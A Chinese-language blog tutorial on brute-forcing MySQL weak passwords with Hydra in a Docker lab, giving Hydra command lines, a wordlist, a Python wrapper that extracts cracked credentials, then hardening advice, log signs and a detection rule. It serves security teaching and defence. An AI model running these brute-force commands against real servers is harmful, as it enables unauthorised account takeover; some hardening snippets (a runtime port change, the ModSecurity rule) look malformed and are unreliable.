渗透测试实战:使用Hydra破解MySQL弱口令(附合法授权流程+防御方案)
渗透测试实战:使用Hydra破解MySQL弱口令(附合法授权流程+防御方案)
郑重声明:本文仅供安全学习研究,任何未经授权的网络攻击行为均属违法。实操需获得目标系统书面授权,请遵守《网络安全法》相关规定。
一、实验环境搭建(合法授权测试)
1.1 测试环境配置
#先拉取镜像:靶机246docker pull swr.cn-north-4.myhuaweicloud.com/ddn-k8s/docker.io/library/mysql:5.7
# 使用Docker快速搭建MySQL测试环境
docker run --name mysql_test -e MYSQL_ROOT_PASSWORD=123456 -p 3306:3306 -d swr.cn-north-4.myhuaweicloud.com/ddn-k8s/docker.io/library/mysql:5.7# 创建测试账户
docker exec -it mysql_test mysql -uroot -p123456 CREATE USER 'testuser'@'%' IDENTIFIED BY '123456';
FLUSH PRIVILEGES;GRANT ALL PRIVILEGES ON *.* TO 'testuser'@'%';
FLUSH PRIVILEGES;
1.2 Hydra工具安装
#虚拟机镜像下载地址
https://www.kali.org/get-kali/#kali-platforms
#下载kali linux镜像
kali-linux-2025.1a-installer-amd64.iso
#vm上安装kali linux
二、弱口令爆破实战步骤
2.1 准备密码字典
创建 passwords.txt 文件:
123456
admin
root
password
qwerty
test
123456789
letmein
Welcome123# 下载常用弱口令字典(可选)
wget https://githubfast.com/danielmiessler/SecLists/raw/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt
创建user.txt用户名字典:
root
testuser
2.2 基础爆破命令
#限制并发任务数
hydra -t 1 -l testuser -P passwords.txt mysql://192.167.14.246
#不限制并发数(可选)
hydra -l testuser -P passwords.txt mysql://192.167.14.246
#(可选)
hydra -L user.txt -P password.txt ssh://靶机ip2.3 高级参数爆破
hydra -L users.txt -P passwords.txt \
mysql://192.167.14.246 -vV -t 32 -f -I \
-s 3306 -e ns -W 3 -o result.txt
参数解析:
-vV:显示详细过程-t 32:使用32个线程-f:找到第一个匹配后停止-s 3306:指定非标准端口-e ns:尝试空密码和用户名密码相同-W 3:请求间隔3秒
三、自动化破解脚本示例
3.1 Python自动化检测脚本
import subprocess
import redef hydra_mysql_attack(target_ip, port, user_list, pass_list):cmd = ['hydra','-L', user_list,'-P', pass_list,'-e', 'ns','-s', str(port),'-o', 'hydra_result.txt','mysql://' + target_ip]process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,text=True # 确保输出为文本)output_buffer = ""while True:# 逐字符读取输出char = process.stdout.read(1)if not char and process.poll() is not None:breakif char:output_buffer += char# 检查是否包含有效凭证if "successfully" in output_buffer.lower():print("[+] 发现有效凭证:")matches = re.findall(r'login:\s*(\S+)\s+password:\s*(\S+)', output_buffer)if matches:for match in matches:print(f"用户名: {match[0]}, 密码: {match[1]}")process.terminate()break# 使用示例
hydra_mysql_attack(target_ip="192.167.14.246",port=3306,user_list="users.txt",pass_list="passwords.txt"
)
四、防御加固方案
4.1 MySQL安全配置
-- 修改默认端口
SET GLOBAL port = 3366;-- 启用密码复杂度策略
INSTALL PLUGIN validate_password SONAME 'validate_password.so';
SET GLOBAL validate_password_policy=STRONG;-- 设置登录失败锁定
ALTER USER 'testuser'@'%' WITH FAILED_LOGIN_ATTEMPTS 3 PASSWORD_LOCK_TIME 1;
4.2 网络层防护
# 使用iptables限制访问
iptables -A INPUT -p tcp --dport 3306 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 3306 -j DROP# 启用SSL加密
mysql_ssl_rsa_setup --uid=mysql
五、法律风险告知
- 授权测试:必须获得目标系统的书面授权
- 日志留存:测试过程需完整记录日志备查
- 数据保护:禁止接触真实业务数据
- 报告机制:发现漏洞后应立即停止测试并报告
六、攻击特征分析(WAF防护策略)
6.1 识别Hydra攻击特征
# 典型攻击日志特征
[Warning] Host '192.168.1.5' has more than 'max_connect_errors'
[Note] Aborted connection 45 to db: 'unconnected' user: 'testuser'
6.2 防御规则示例(ModSecurity)
<SecRule ENGINE:DETECT_HYDRA "@ge 5" "phase:1,id:1001,deny,status:403,
msg:'Hydra brute force attack detected',logdata:'Matched count: %{MATCHED_VAR}'"
技术总结:本文演示了在合法授权环境下使用Hydra进行MySQL弱口令检测的全流程。安全从业人员应掌握攻击原理以建立有效防御,普通用户需提高密码安全意识。
拓展阅读:
- 《MySQL 8.0安全白皮书》
- OWASP认证安全指南
请务必遵守网络安全法律法规,技术需向善! 🔐
如果本教程帮助您解决了问题,请点赞❤️收藏⭐支持!欢迎在评论区留言交流技术细节!
相关文章:
渗透测试实战:使用Hydra破解MySQL弱口令(附合法授权流程+防御方案)
渗透测试实战:使用Hydra破解MySQL弱口令(附合法授权流程防御方案) 郑重声明:本文仅供安全学习研究,任何未经授权的网络攻击行为均属违法。实操需获得目标系统书面授权,请遵守《网络安全法》相关规定。 一、…...
一文了解亿级数据检索:RedisSearch
文章目录 1.什么是Redis Search2.为什么要使用Redis Search3.RedisSearch 的核心特性4.RedisSearch 的原理4.1 倒排索引4.2 索引创建与数据存储4.3 数据模型4.4 搜索查询处理4.5 高性能与可扩展性: 5.有了ES为什么还需要RedisSearch5.RedisSearch的安装6.RedisSearc…...
uniApp开发微信小程序-连接蓝牙连接打印机上岸!
历经波折三次成功上岸! 三次经历简单絮叨一下:使用uniAppvue开发的微信小程序,使用蓝牙连接打印机,蓝牙所有的接口都是插件中封装的,用的插件市场中的这个: dothan-lpapi-ble ;所以,…...
Spring Boot 线程池配置详解
Spring Boot 线程池配置详解 一、核心配置参数及作用 基础参数核心线程数 (corePoolSize) 作用:线程池中始终保持存活的线程数量,即使空闲也不回收。 建议:根据任务类型设定(如 I/O 密集型任务可设为 CPU 核心数 2)。 最大线程数 (maxPoolSize) 作用:…...
【特权FPGA】之按键消抖
完整代码如下所示: timescale 1ns / 1ps// Company: // Engineer: 特权 // // Create Date: // Design Name: // Module Name: // Project Name: // Target Device: // Tool versions: // Description: // // Dependencies: // // Revision: // …...
P1331 洛谷 海战
题目描述 思路 这个题需要读懂题意,即“什么样的形式表示两只船相撞?” ----> 上下相邻或左右相邻 如果图是不和法的,一定存在如下结构: # # . # 或 # # # . 或 # . # # 或 . # # #即四个格子里有三个#,一个"…...
)
Python 实现的运筹优化系统数学建模详解(最大最小化模型)
一、引言 在数学建模的实际应用里,最大最小化模型是一种极为关键的优化模型。它的核心目标是找出一组决策变量,让多个目标函数值里的最大值尽可能小。该模型在诸多领域,如资源分配、选址规划等,都有广泛的应用。本文将深入剖析最大…...
网络安全·第二天·ARP协议安全分析
今天我们来考虑考虑计算机网络中的一类很重要的协议-------ARP协议,介绍他用途的同时,分析分析ARP协议存在的一些漏洞及其相关的协议问题。 一、物理地址与IP地址 1、举例 在计算机网络中,有两类地址十分关键,一类称为物理地址&a…...
Python设计模式:命令模式
1. 什么是命令模式? 命令模式是一种行为设计模式,它将请求封装为一个对象,从而使您能够使用不同的请求、队列或日志请求,以及支持可撤销操作。 命令模式的核心思想是将请求的发送者与请求的接收者解耦,使得两者之间的…...
华为手机或平板与电脑实现文件共享
1.手机或平板与电脑在同一个网络 2.打开手机或平板端,设置---更多连接----快分享或华为分享打开此功能-----开启共享至电脑 3.打开电脑,网络中就可看到手机端分享的用户名称 4. 登陆就可访问手机 5.常见问题 5.1 电脑未发现本机 5.2 修改了访问密码后再…...
幻兽帕鲁(Palworld)在线工具集:让游戏体验更轻松!
幻兽帕鲁(Palworld)在线工具集:让游戏体验更轻松! 🎮 工具介绍 为了帮助广大幻兽帕鲁玩家更好地享受游戏,我开发了这个全面的在线工具集。无需下载安装,打开网页即可使用,完全免费! …...
学习51单片机Day02---实验:点亮一个LED灯
目录 1.先看原理图 2.思考一下(sbit的使用): 3.给0是要让这个LED亮(LED端口设置为低电平) 4.完成的代码 1.先看原理图 比如我们要让LED3亮起来,对应的是P2^2。 2.思考一下(sbit的使用&…...
【Kubernetes】Kubernetes 如何进行日志管理?Fluentd / Loki / ELK 适用于什么场景?
由于 Kubernetes 运行在容器化的环境中,应用程序和系统日志通常分布在多个容器和节点上,传统的日志管理方法(例如直接访问每个节点的日志文件)在 Kubernetes 中不适用。 因此,Kubernetes 引入了集中式日志管理方案&am…...
如何使用通义灵码学习JavaScript和DOM
如果你看到了本手册的页面数量,你就会发现JavaScript的API真的非常丰富,在MDN上专门有一大分类用于介绍JavaScript的API,但软件工程行业有一个著名法则叫2-8法则,意思是只有20%的内容会经常使用到,而80%的内容只在一些…...
Elasticsearch8.x集成SpringBoot3.x
Elasticsearch8.x集成SpringBoot3.x 配置项目引入依赖添加配置文件导入ca证书到项目中添加配置 实战操作创建mapping创建文档查询更新全量更新删除数据批量操作(bulk)基本搜索复杂布尔搜索嵌套(nested)搜索分页查询滚动分页查询After分页查询词条(terms)聚合日期聚合 配置项目 …...
基于labview的多功能数据采集系统
基于labview的多功能数据采集系统(可定制功能) 包含基于NI温度采集卡。电流采集卡。电压采集卡的数据采集功能 数据存储 报表存储 数据处理与分析 生产者消费者架构 有需要可联系...
250410异常记事
今天遇到一件极坑的事情,关于uni.setStorageSync: Invalid args: type check failed for args “key”. Expected String, got Boolean with value true. 项目是网上下的一个element-plus、uniapp 混搭的框架https://ext.dcloud.net.cn/plugin?id16396 异常代码如…...
小程序租赁系统源码功能分享
系统架构图解:技术栈与业务流程 设备租赁系统的架构可以分为三个主要部分:后台服务(SpringBoot MyBatisPlus MySQL)、用户端与师傅端(UniApp)、以及管理后台(Vue ElementUI)。下…...
30天学Java第八天——设计模式
装饰器模式 Decorator Pattern 装饰器模式(Decorator Pattern)是一种结构型设计模式,它允许通过动态地添加功能来扩展对象的行为,而不需要修改原有的类。 这种模式通常用于增强对象的功能,与继承相比,使用…...
Linux 调试代码工具:gdb
文章目录 一、debug vs release:两种程序形态的本质差异1. 什么是 debug 与 release?2. 核心差异对比 二、为什么需要 debug:从项目生命周期看调试价值1. 项目开发流程中的调试闭环(流程图示意)2. Debug 的核心意义与目…...
SpringMVC基础一(SpringMVC运行原理)
先了解MVC,在JavaWeb基础五中。 回忆servlet,在javaweb基础二中。 创建一个web项目: 1、新建maven项目,导入依赖。(junit、springmvc、spring-webmvc、servlet-api、jsp-api、jstl) <groupId>org…...
Java权限修饰符深度解析
Java权限修饰符深度解析与最佳实践 一、权限修饰符总览 Java提供四种访问控制修饰符,按访问范围从宽到窄排序如下: 修饰符类内部同包类不同包子类全局范围public✔️✔️✔️✔️protected✔️✔️✔️❌默认(无)✔️✔️❌❌pr…...
Springboot JPA ShardingSphere 根据年分表
Spring Boot集成JPA与ShardingSphere实现按年分表,需重点关注分片算法选择、时间字段映射及动态表管理。以下是实现方案: 一、依赖配置 1. 核心依赖引入 <!-- ShardingSphere JDBC --> <dependency><groupId>org.apache.shardi…...
uniapp小程序生成海报/图片并保存分享
调研结果: 方法一:canvasuni.canvasToTempFilePath耗时太长,现在卡在canvas的绘制有问题,canvas绘制的部分东西不生效但是找不到原因 方法二:使用wxml-to-canvas其实也差不多是用canvas手动绘制,可能会卡在…...
蓝桥杯刷题--宝石组合
在一个神秘的森林里,住着一个小精灵名叫小蓝。有一天,他偶然发现了一个隐藏在树洞里的宝藏,里面装满了闪烁着美丽光芒的宝石。这些宝石都有着不同的颜色和形状,但最引人注目的是它们各自独特的 “闪亮度” 属性。每颗宝石都有一个…...
红宝书第三十一讲:通俗易懂的包管理器指南:npm 与 Yarn
红宝书第三十一讲:通俗易懂的包管理器指南:npm 与 Yarn 资料取自《JavaScript高级程序设计(第5版)》。 查看总目录:红宝书学习大纲 一、基础概念 包管理器:帮你自动下载和管理第三方代码库(如…...
进程状态的转换
进程处于运行态时,它必须已获得所需的资源,在运行结束后就撤销。只有在时间片到或出现了比现在进程优先级更高的进程时才转变成就绪态。 就绪 → 运行 触发条件:进程被调度器选中(如时间片轮转或优先级调度&…...
SpringAOP新链浅析
前言 在复现CCSSSC软件攻防赛的时候发现需要打SpringAOP链子,于是跟着前人的文章自己动手调试了一下 参考了大佬的文章 https://gsbp0.github.io/post/springaop/#%E6%B5%81%E7%A8%8B https://mp.weixin.qq.com/s/oQ1mFohc332v8U1yA7RaMQ 正文 依赖于Spring-AO…...
【动手学深度学习】现代卷积神经网络:ALexNet
【动手学深度学习】现代卷积神经网络:ALexNet 1,ALexNet简介2,AlexNet和LeNet的对比3, AlexNet模型详细设计4,AlexNet采用ReLU激活函数4.1,ReLU激活函数4.2,sigmoid激活函数4.3,为什…...
PyTorch深度学习框架60天进阶学习计划 - 第37天:元学习框架
PyTorch深度学习框架60天进阶学习计划 - 第37天:元学习框架 嘿,朋友们!欢迎来到我们PyTorch进阶之旅的第37天。今天我们将深入探索一个非常有趣且强大的领域——元学习(Meta-Learning),也被称为"学会学习"(Learning to…...